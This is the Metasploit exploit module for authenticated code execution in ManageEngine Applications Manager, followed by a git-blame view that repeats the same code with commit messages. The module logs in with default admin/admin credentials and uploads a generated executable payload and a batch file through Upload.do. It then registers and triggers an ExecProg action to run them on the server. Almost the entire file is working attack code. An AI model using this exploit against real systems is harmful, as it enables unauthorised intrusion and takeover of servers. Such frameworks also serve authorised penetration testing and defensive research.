metasploit-framework/modules/exploits/windows/http/manageengine_apps_mngr.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize
		super(
			'Name'           => 'ManageEngine Applications Manager Authenticated Code Execution',
			'Description'	 => %q{
						This module logs into the Manage Engine Appplications Manager to upload a
					payload to the file system and a batch script that executes the payload. },
			'Author'	 => 'Jacob Giannantonio <JGiannan[at]gmail.com>',
			'Platform'	 => 'win',
			'DisclosureDate' => 'Apr 08 2011',
			'Targets'	 =>
				[
					['Automatic',{}],
				],
			'DefaultTarget'	 => 0
			)

		register_options(
			[ Opt::RPORT(9090),
				OptString.new('URI', [false, "URI for Applications Manager", '/']),
				OptString.new('USER', [false, "username", 'admin']),
				OptString.new('PASS', [false, "password", 'admin']),
		], self.class)
	end
	def target_url
		uri = normalize_uri(datastore['URI'])
		"http://#{rhost}:#{rport}#{uri}"
	end
	def exploit
		# Make initial request to get assigned a session token
		cookie = "pagerefresh=1; NfaupdateMsg=true; sortBy=sByName; testcookie=; "
		cookie << "am_username=;am_check="
		begin
			print_status "#{target_url} Applications Manager - Requesting Session Token"
			res = send_request_cgi({
				'method'=> 'GET',
				'uri'	=> "#{target_url}/webclient/common/jsp/home.jsp",
				'cookie'  => cookie.to_s
			}, 20)

			if !res
				print_error("Request to #{target_host} failed")
				return
			end

			if (res and res.code == 200 and res.to_s =~ /(JSESSIONID=[A-Z0-9]{32});/)
				cookie << "; #{$1}"
				print_good("Assigned #{$1}")
			else
				print_error("Initial request failed: http error #{res.code}")
				return
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		# send cookie to index.do
		begin
			print_status "Sending session token to #{target_url}/index.do"
			res = send_request_raw({
				'method'  => 'GET',
				'uri'     => "#{target_url}/index.do",
				'cookie' => cookie
			}, 20)

			if !res || res.code != 200
				print_error("Request to #{target_url} failed")
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/index.do failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		# Log in with the assigned session token
		post_data = "clienttype2=html&j_username="
		post_data << "#{Rex::Text.uri_encode(datastore['USER'].to_s)}&"
		post_data << "j_password="
		post_data << "#{Rex::Text.uri_encode(datastore['PASS'].to_s)}&button=Login"
		print_status("Trying to log in with '#{datastore['USER']}':'#{datastore['PASS']}'")

		begin
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/j_security_check",
				'cookie' => cookie,
				'data'    => post_data.to_s
			}, 20)

			if !res
				print_error("Request to #{target_url} Failed")
			end
			# Server responds with a 302 redirect when the login is successful and
			# HTTP 200 for a failed login
			if res and res.code == 302
				print_good("Success:'#{datastore['USER']}':'#{datastore['PASS']}'")
			else
				print_error("Failed to log into #{target_url}")
				return
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/j_security_check failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end
		# initial request to upload.do
		# I think this is required to upload content later on.
		begin
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/Upload.do",
				'cookie'=> cookie,
				'data'    => post_data
			}, 20)

			if !res
				print_error("HTTP request to #{target_url} Failed")
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/Upload.do Failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		# Transfer the payload executable via POST request to Upload.do
		boundary = rand_text_numeric(11)
		payload_file = "#{rand_text_alphanumeric(20)}.exe"
		lines = "-----------------------------#{boundary}"
		content_disposition = "Content-Disposition: form-data; name=\"theFile\";"
		content_disposition << "filename=\"#{payload_file}\"\r\n"
		post_data = lines + "\r\n" + content_disposition.to_s
		post_data << "Content-Type: application/x-msdos-program\r\n\r\n"
		post_data << "#{generate_payload_exe}\r\n\r\n"
		post_data << lines + "\r\nContent-Disposition: form-data; "
		post_data << "name=\"uploadDir\"\r\n\r\n"
		post_data << ".\/\r\n#{lines}--\r\n"

		begin
			referer = "http://#{target_url}/Upload.do"
			res = send_request_raw({
				'method'  => 'POST',
				'uri'     => "#{target_url}/Upload.do",
				'headers' => {  'Referer' => referer,
					'cookie' => "#{cookie}\r\nContent-Type: " +
					"multipart/form-data; " +
					"boundary=---------------------------#{boundary}",
					'Content-Length' => post_data.length},
					'data'    => post_data
			}, 20)

			if !res
				print_error("Request to #{target_url} failed")
			end

			if res and res.code == 200
				print_good("Uploaded payload #{payload_file}")
			else
				print_error("Response HTTP #{res.code} and HTTP 302 expected")
			end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/Upload.do failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end
		# Transfer the batch sript via POST request to Upload.do
		# The server will eventually call the batch script, which will call the payload.exe
		boundary = rand_text_numeric(11)
		bat_file = "#{rand_text_alphanumeric(20)}.bat"
		lines = "-----------------------------#{boundary}"
		content_disposition = "Content-Disposition: form-data; name=\"theFile\"; "
		content_disposition << "filename=\"#{bat_file}\"\r\n"
		post_data = lines + "\r\n" + content_disposition.to_s
		post_data << "Content-Type: application/x-msdos-program\r\n\r\n"
		post_data << "@ECHO off && \"C:\\\\program files\\ManageEngine\\AppManager9\\workin"
		post_data << "g\\#{payload_file}\"\r\n\r\n"
		post_data << lines + "\r\nContent-Disposition: form-data; name=\"uploadDir\""
		post_data << "\r\n\r\n"
		post_data << ".\/\r\n#{lines}--\r\n"

		begin
			referer = "#{target_url}/Upload.do"
				res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/Upload.do",
				'headers' => {  'Referer' => referer,
				'cookie' => "#{cookie}\r\nContent-Type: multipart/form-data; " +
				"boundary=---------------------------#{boundary}",
				'Content-Length' => post_data.length},
				'data'    => post_data
			}, 20)

			if !res
				print_error("HTTP request to #{target_url} failed")
				return
			end

			if res and res.code == 200
				print_good("Uploaded #{bat_file} to execute #{payload_file}")
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/Upload.do failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		action_name = "#{rand_text_alphanumeric(20)}"
		post_data = "actions=%2FshowTile.do%3FTileName%3D.ExecProg%26haid%3Dnull&ha"
		post_data << "id=null&method=createExecProgAction&redirectTo=null&id=0&disp"
		post_data << "layname=#{action_name}&serversite=local&choosehost=-2&host=&m"
		post_data << "onitoringmode=TELNET&username=&password=&description=&port=23"
		post_data << "&prompt=%24&command=#{bat_file}&execProgExecDir="
		post_data << "C%3A%5CProgram+Files%5CManageEngine%5CAppManager9%5Cworking&a"
		post_data << "bortafter=10&cancel=false"

		# This client request is necessary because it sends a request to the server
		# specifying that we are interested in executing the batch script.  If
		# successful, the server response body will contain an actionID that is
		# used to tell the server to execute the script.
		begin
			referer = "#{target_url}/showTile.do?TileName=.ExecProg&haid=null"
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/adminAction.do",
				'headers' => {  'Referer' => referer,
				'cookie' => cookie,
				'Content-Type' => "application/x-www-form-urlencoded",
				'Content-Length' => post_data.to_s.length},
				'data'    => post_data.to_s
			}, 20)

			if !res
				print_error("Request to #{target_host} failed")
			end

			# We are parsing the response in order to determine the correct actionID.
			# My solution for doing this is to iterate through the HTTP response one
			# line at a time.  The correct actionID always comes up several lines
			# after reading the name of the batch file 3 times.  Even if other batch
			# files are mixed up in the list of actions to execute, ours is always
			# the next one after reading the batch file name 3 times

			if res and (res.code == 302 || res.code == 200)
				action_id = 0
				x = 0
				res.body.each_line do |k|
					k.strip!
					if((k =~ /&actionID=(\d{8})/) && (x == 3))
						action_id = $1
						break;
					elsif((k =~ /#{bat_file}/) && (x < 3))
						x+=1
					end
				end
			else
				print_error("HTTP error #{res.code} and HTTP 302 expected")
			end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("HTTP request to #{target_url}/adminAction.do ")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		begin
			referer = "#{target_url}/common/executeScript.do?"
			referer << "method=testAction&actionID=#{action_id}&haid=null"
			print_good("Requesting to execute batch file with actionID #{action_id}")
			res = send_request_cgi({
				'method'  => 'GET',
				'uri'     => "#{target_url}/common/executeScript.do?method=testAction&" +
						"actionID=#{action_id}&haid=null",
				'headers' => {  'Referer' => referer,
				'cookie' => 	"executeProgramActionTable_sortcol=1; " +
						"executeProgramActionTable_sortdir=down; " +
						"#{cookie}; executeProgramActionTable_" +
						"sortdir=down; executeProgramActionTable_sortcol=1",
				'Content-Type' => "application/x-www-form-urlencoded"}
			}, 20)

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("Request to execute the actionID failed")
		rescue ::Timeout::Error, ::Errno::EPIPE
		end
	end
end
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
This module never got a ranking, adding one git-svn-id: file:///home/svn/framework3/trunk@13934 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-15 20:07:59 +00:00			`Rank = AverageRanking`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::EXE`

			`def initialize`
			`super(`
Add disclosure dates to all the exploit modules that didn't have one git-svn-id: file:///home/svn/framework3/trunk@13938 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-15 21:09:17 +00:00			`'Name' => 'ManageEngine Applications Manager Authenticated Code Execution',`
			`'Description' => %q{`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`This module logs into the Manage Engine Appplications Manager to upload a`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`payload to the file system and a batch script that executes the payload. },`
Add disclosure dates to all the exploit modules that didn't have one git-svn-id: file:///home/svn/framework3/trunk@13938 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-15 21:09:17 +00:00			`'Author' => 'Jacob Giannantonio <JGiannan[at]gmail.com>',`
			`'Platform' => 'win',`
			`'DisclosureDate' => 'Apr 08 2011',`
			`'Targets' =>`
			`[`
			`['Automatic',{}],`
			`],`
			`'DefaultTarget' => 0`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`)`
Solved most of msftidy issues with the /modules directory 2011-11-28 04:42:59 +00:00
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`register_options(`
			`[ Opt::RPORT(9090),`
			`OptString.new('URI', [false, "URI for Applications Manager", '/']),`
			`OptString.new('USER', [false, "username", 'admin']),`
			`OptString.new('PASS', [false, "password", 'admin']),`
			`], self.class)`
			`end`
			`def target_url`
Add normalize_uri to modules that may have been missed by PULL 1045. Please ensure PULL 1045 is in place prior to looking at this (as it implements normalize_uri) ref --> https://github.com/rapid7/metasploit-framework/pull/1045 2012-11-08 16:42:48 +00:00			`uri = normalize_uri(datastore['URI'])`
			`"http://#{rhost}:#{rport}#{uri}"`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`end`
			`def exploit`
			`# Make initial request to get assigned a session token`
			`cookie = "pagerefresh=1; NfaupdateMsg=true; sortBy=sByName; testcookie=; "`
			`cookie << "am_username=;am_check="`
			`begin`
			`print_status "#{target_url} Applications Manager - Requesting Session Token"`
			`res = send_request_cgi({`
			`'method'=> 'GET',`
Change Vendor name, forgot one target uri fixup git-svn-id: file:///home/svn/framework3/trunk@12275 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 23:31:12 +00:00			`'uri' => "#{target_url}/webclient/common/jsp/home.jsp",`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`'cookie' => cookie.to_s`
			`}, 20)`

			`if !res`
			`print_error("Request to #{target_host} failed")`
			`return`
			`end`

			`if (res and res.code == 200 and res.to_s =~ /(JSESSIONID=[A-Z0-9]{32});/)`
			`cookie << "; #{$1}"`
			`print_good("Assigned #{$1}")`
			`else`
			`print_error("Initial request failed: http error #{res.code}")`
			`return`
			`end`

			`rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`

			`# send cookie to index.do`
			`begin`
			`print_status "Sending session token to #{target_url}/index.do"`
			`res = send_request_raw({`
			`'method' => 'GET',`
			`'uri' => "#{target_url}/index.do",`
			`'cookie' => cookie`
			`}, 20)`

			`if !res \|\| res.code != 200`
			`print_error("Request to #{target_url} failed")`
			`end`

			`rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout`
			`print_error("Request to #{target_url}/index.do failed")`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`

			`# Log in with the assigned session token`
			`post_data = "clienttype2=html&j_username="`
			`post_data << "#{Rex::Text.uri_encode(datastore['USER'].to_s)}&"`
			`post_data << "j_password="`
			`post_data << "#{Rex::Text.uri_encode(datastore['PASS'].to_s)}&button=Login"`
			`print_status("Trying to log in with '#{datastore['USER']}':'#{datastore['PASS']}'")`

			`begin`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => "#{target_url}/j_security_check",`
			`'cookie' => cookie,`
			`'data' => post_data.to_s`
			`}, 20)`

			`if !res`
			`print_error("Request to #{target_url} Failed")`
			`end`
			`# Server responds with a 302 redirect when the login is successful and`
			`# HTTP 200 for a failed login`
			`if res and res.code == 302`
			`print_good("Success:'#{datastore['USER']}':'#{datastore['PASS']}'")`
			`else`
			`print_error("Failed to log into #{target_url}")`
			`return`
			`end`

			`rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout`
			`print_error("Request to #{target_url}/j_security_check failed")`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`
			`# initial request to upload.do`
			`# I think this is required to upload content later on.`
			`begin`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => "#{target_url}/Upload.do",`
			`'cookie'=> cookie,`
			`'data' => post_data`
			`}, 20)`

			`if !res`
			`print_error("HTTP request to #{target_url} Failed")`
			`end`

			`rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout`
			`print_error("Request to #{target_url}/Upload.do Failed")`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`

			`# Transfer the payload executable via POST request to Upload.do`
			`boundary = rand_text_numeric(11)`
			`payload_file = "#{rand_text_alphanumeric(20)}.exe"`
			`lines = "-----------------------------#{boundary}"`
			`content_disposition = "Content-Disposition: form-data; name=\"theFile\";"`
			`content_disposition << "filename=\"#{payload_file}\"\r\n"`
			`post_data = lines + "\r\n" + content_disposition.to_s`
			`post_data << "Content-Type: application/x-msdos-program\r\n\r\n"`
			`post_data << "#{generate_payload_exe}\r\n\r\n"`
			`post_data << lines + "\r\nContent-Disposition: form-data; "`
			`post_data << "name=\"uploadDir\"\r\n\r\n"`
			`post_data << ".\/\r\n#{lines}--\r\n"`

			`begin`
			`referer = "http://#{target_url}/Upload.do"`
			`res = send_request_raw({`
			`'method' => 'POST',`
			`'uri' => "#{target_url}/Upload.do",`
			`'headers' => { 'Referer' => referer,`
			`'cookie' => "#{cookie}\r\nContent-Type: " +`
			`"multipart/form-data; " +`
			`"boundary=---------------------------#{boundary}",`
			`'Content-Length' => post_data.length},`
			`'data' => post_data`
			`}, 20)`

			`if !res`
			`print_error("Request to #{target_url} failed")`
			`end`

			`if res and res.code == 200`
			`print_good("Uploaded payload #{payload_file}")`
			`else`
			`print_error("Response HTTP #{res.code} and HTTP 302 expected")`
			`end`

			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`print_error("Request to #{target_url}/Upload.do failed")`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`
			`# Transfer the batch sript via POST request to Upload.do`
			`# The server will eventually call the batch script, which will call the payload.exe`
			`boundary = rand_text_numeric(11)`
			`bat_file = "#{rand_text_alphanumeric(20)}.bat"`
			`lines = "-----------------------------#{boundary}"`
			`content_disposition = "Content-Disposition: form-data; name=\"theFile\"; "`
			`content_disposition << "filename=\"#{bat_file}\"\r\n"`
			`post_data = lines + "\r\n" + content_disposition.to_s`
			`post_data << "Content-Type: application/x-msdos-program\r\n\r\n"`
			`post_data << "@ECHO off && \"C:\\\\program files\\ManageEngine\\AppManager9\\workin"`
			`post_data << "g\\#{payload_file}\"\r\n\r\n"`
			`post_data << lines + "\r\nContent-Disposition: form-data; name=\"uploadDir\""`
			`post_data << "\r\n\r\n"`
			`post_data << ".\/\r\n#{lines}--\r\n"`

			`begin`
			`referer = "#{target_url}/Upload.do"`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => "#{target_url}/Upload.do",`
			`'headers' => { 'Referer' => referer,`
			`'cookie' => "#{cookie}\r\nContent-Type: multipart/form-data; " +`
			`"boundary=---------------------------#{boundary}",`
			`'Content-Length' => post_data.length},`
			`'data' => post_data`
			`}, 20)`

			`if !res`
			`print_error("HTTP request to #{target_url} failed")`
			`return`
			`end`

			`if res and res.code == 200`
			`print_good("Uploaded #{bat_file} to execute #{payload_file}")`
			`end`

			`rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout`
			`print_error("Request to #{target_url}/Upload.do failed")`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`

			`action_name = "#{rand_text_alphanumeric(20)}"`
			`post_data = "actions=%2FshowTile.do%3FTileName%3D.ExecProg%26haid%3Dnull&ha"`
			`post_data << "id=null&method=createExecProgAction&redirectTo=null&id=0&disp"`
			`post_data << "layname=#{action_name}&serversite=local&choosehost=-2&host=&m"`
			`post_data << "onitoringmode=TELNET&username=&password=&description=&port=23"`
			`post_data << "&prompt=%24&command=#{bat_file}&execProgExecDir="`
			`post_data << "C%3A%5CProgram+Files%5CManageEngine%5CAppManager9%5Cworking&a"`
			`post_data << "bortafter=10&cancel=false"`

			`# This client request is necessary because it sends a request to the server`
			`# specifying that we are interested in executing the batch script. If`
			`# successful, the server response body will contain an actionID that is`
			`# used to tell the server to execute the script.`
			`begin`
			`referer = "#{target_url}/showTile.do?TileName=.ExecProg&haid=null"`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => "#{target_url}/adminAction.do",`
			`'headers' => { 'Referer' => referer,`
			`'cookie' => cookie,`
			`'Content-Type' => "application/x-www-form-urlencoded",`
			`'Content-Length' => post_data.to_s.length},`
			`'data' => post_data.to_s`
			`}, 20)`

			`if !res`
			`print_error("Request to #{target_host} failed")`
			`end`

			`# We are parsing the response in order to determine the correct actionID.`
			`# My solution for doing this is to iterate through the HTTP response one`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`# line at a time. The correct actionID always comes up several lines`
			`# after reading the name of the batch file 3 times. Even if other batch`
			`# files are mixed up in the list of actions to execute, ours is always`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`# the next one after reading the batch file name 3 times`

			`if res and (res.code == 302 \|\| res.code == 200)`
			`action_id = 0`
			`x = 0`
Change Vendor name, forgot one target uri fixup git-svn-id: file:///home/svn/framework3/trunk@12275 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 23:31:12 +00:00			`res.body.each_line do \|k\|`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`k.strip!`
			`if((k =~ /&actionID=(\d{8})/) && (x == 3))`
			`action_id = $1`
			`break;`
			`elsif((k =~ /#{bat_file}/) && (x < 3))`
			`x+=1`
			`end`
			`end`
			`else`
			`print_error("HTTP error #{res.code} and HTTP 302 expected")`
			`end`

			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`print_error("HTTP request to #{target_url}/adminAction.do ")`
			`return`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`return`
			`end`

			`begin`
			`referer = "#{target_url}/common/executeScript.do?"`
			`referer << "method=testAction&actionID=#{action_id}&haid=null"`
			`print_good("Requesting to execute batch file with actionID #{action_id}")`
			`res = send_request_cgi({`
			`'method' => 'GET',`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`'uri' => "#{target_url}/common/executeScript.do?method=testAction&" +`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`"actionID=#{action_id}&haid=null",`
			`'headers' => { 'Referer' => referer,`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`'cookie' => "executeProgramActionTable_sortcol=1; " +`
			`"executeProgramActionTable_sortdir=down; " +`
			`"#{cookie}; executeProgramActionTable_" +`
Added Netflow Apps Manager Remote Code Execution exploit git-svn-id: file:///home/svn/framework3/trunk@12272 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-07 21:01:34 +00:00			`"sortdir=down; executeProgramActionTable_sortcol=1",`
			`'Content-Type' => "application/x-www-form-urlencoded"}`
			`}, 20)`

			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`print_error("Request to execute the actionID failed")`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`end`
			`end`
This module never got a ranking, adding one git-svn-id: file:///home/svn/framework3/trunk@13934 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-15 20:07:59 +00:00			`end`